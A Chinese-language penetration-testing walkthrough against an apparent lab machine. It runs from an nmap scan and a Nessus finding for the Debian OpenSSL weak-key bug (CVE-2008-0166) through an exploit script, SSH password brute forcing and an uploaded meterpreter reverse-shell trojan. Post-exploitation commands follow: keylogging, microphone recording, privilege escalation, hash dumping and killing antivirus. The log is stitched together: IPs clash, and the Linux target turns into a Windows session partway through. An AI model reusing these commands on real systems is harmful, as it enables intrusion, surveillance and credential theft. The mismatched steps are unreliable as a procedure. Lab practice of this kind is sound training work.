一信息收集:
1根据条件生成密码字典:
选择条件的字符
生成对应的字典
对对应的网段进行主机存活扫描:
nmap -sP 192.168.183.0/24
分析那个网段是靶子计算机由于本网段的ip为183.129
且网管和服务器占据了183.1和183.2和183.254
剩下的2个ip,由于开了两个网卡,再次我们不妨定下靶子计算机的IP为183.132或则183.133
尝试是否可以通讯:结果可以
查看183.132开启了哪些端口和哪些服务
此处如果存在以下服务漏洞我们就可以对他进行攻击我们就可以对其进行攻击。
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
3306/tcp open mysql
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
2使用nessus软件对192.168.183.132进行漏洞的扫描:
填写相关的信息
开始扫描:
分析结果:
Description
The remote SSH host key has been generated on a Debian or Ubuntu system which contains a bug in the random number generator of its OpenSSL library.
The problem is due to a Debian packager removing nearly all sources of entropy in the remote version of OpenSSL.
An attacker can easily obtain the private part of the remote key and use this to set up decipher the remote session or set up a man in the middle attack.
Solution
Consider all cryptographic material generated on the remote host to be guessable. In particuliar, all SSH, SSL and OpenVPN key material should be re-generated.
此处存在2个高危漏洞,此处我们以ssh为例进行渗透
找出漏洞编号为:CVE-2008-0166
3渗透攻击:
由于CVE-2008-0166不可以直接在bt5上直接用所以就必须去下载相应文件
oot@bt:~# /pentest/exploits/exploitdb/platforms/linux/remote/ openssl
bash: /pentest/exploits/exploitdb/platforms/linux/remote/: is a directory
root@bt:~# cd /pentest/exploits/exploitdb/platforms/linux/remote/
root@bt:/pentest/exploits/exploitdb/platforms/linux/remote# python 5720.py /root/rsa/2048/ 192.168.183.132
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
./exploit.py <dir> <host> <user> [[port] [threads]]
<dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
<host>: The victim host
<user>: The user of the victim host
[port]: The SSH port of the victim host (default 22)
[threads]: Number of threads (default 4) Too big numer is bad
root@bt:/pentest/exploits/exploitdb/platforms/linux/remote# python 5720.py /root/rsa/2048/ 192.168.183.132 root
用msf辅助模块对192.168.183.132进行口令破解:
查找ssh的攻击模块
msf > search ssh
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE pass.txt
PASS_FILE => pass.txt
msf auxiliary(ssh_login) > set THREADS 50
THREADS => 50
msf auxiliary(ssh_login) > run
分析结果:
最终找到了一个用户名:root密码:ubuntu的账号可以登录进去。
使用xshell5进行登录测试:
通过
植入木马:
制作木马生成木马客服端;
msfpayload linux/x86/meterpreter/reverse_tcp lhost=192.168.183.132 lport=5555 x>test6
通过xshell上传木马到192.168.183.132靶子计算机上,执行:
root@metasploitable:~# ./test6
配置木马服务器端
msf exploit(handler) > set LHOST 192.168.183.129
LHOST => 192.168.183.129
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.183.129:5555
[*] Starting the payload handler...
利用木马进行渗透
meterpreter >
eterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter >
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
J
截取声音
meterpreter > record_mic -d 10 (录制10S)
meterpreter > shell 进入对方的SHELL
下载图片
meterpreter > migrate 1632
[*] Migrating to 1632...
[*] Migration completed successfully.
meterpreter >
eterpreter > download calc.exe
[*] downloading: calc.exe -> calc.exe
[*] downloaded : calc.exe -> calc.exe
meterpreter > getpid
Current pid: 1024
eterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeAssignPrimaryTokenPrivilege
meterpreter > getsystem
...got system (via technique 1).
meterpreter > hashdump
Administrator:500:a9a1d510b01177d1aad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
ASPNET:1008:b4df3d6cb6929cc09cb07285b13aca78:9c8be841d72dbd132d22477ff8b7e9d3:::
dg:1009:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_ROOT-TVI862UBEH?:1004:7d730a3707abd506a84a60b453cab938:42fc0d1aaf3eeda15e9c5e64322a29e1:::
IWAM_ROOT-TVI862UBEH:1006:72f7503120401ee0845a72ccde743c03:cb7625dafeb8908bb37b5730d7d36867:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:ac4f5c3f7b7a2bde31f8de9ce3fd1657:::
meterpreter > run post/windows/gather/checkvm
[*] Checking if ROOT-TVI862UBEH is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter > run get_application_list
Installed Applications
======================
Name Version
---- -------
Windows Installer 3.1 (KB893803) 3.1
WinRAR 4.01 (32-bit) 4.01.0
Oracle Data Provider for .NET Help 10.2.000
Kingview Driver 6.53
Kingview 6.53 6.53
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*] The following command was not found: firewall show opmode.
[*] Checking DEP Support Policy...
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
信道:
meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
meterpreter > execute -f cmd.exe -c
Process 2212 created.
Channel 4 created.
meterpreter > channel -w 9
meterpreter > channel -l
Id Class Type
-- ----- ----
2 3 stdapi_process
3 3 stdapi_process
4 3 stdapi_process
meterpreter > channel -w 2
Enter data followed by a '.' on an empty line:
^C[-] Error running command channel: Interrupt
meterpreter > channel -w 9
[-] Invalid channel identifier specified.
meterpreter > channel -w 3
meterpreter > interact 2
Interacting with channel 2...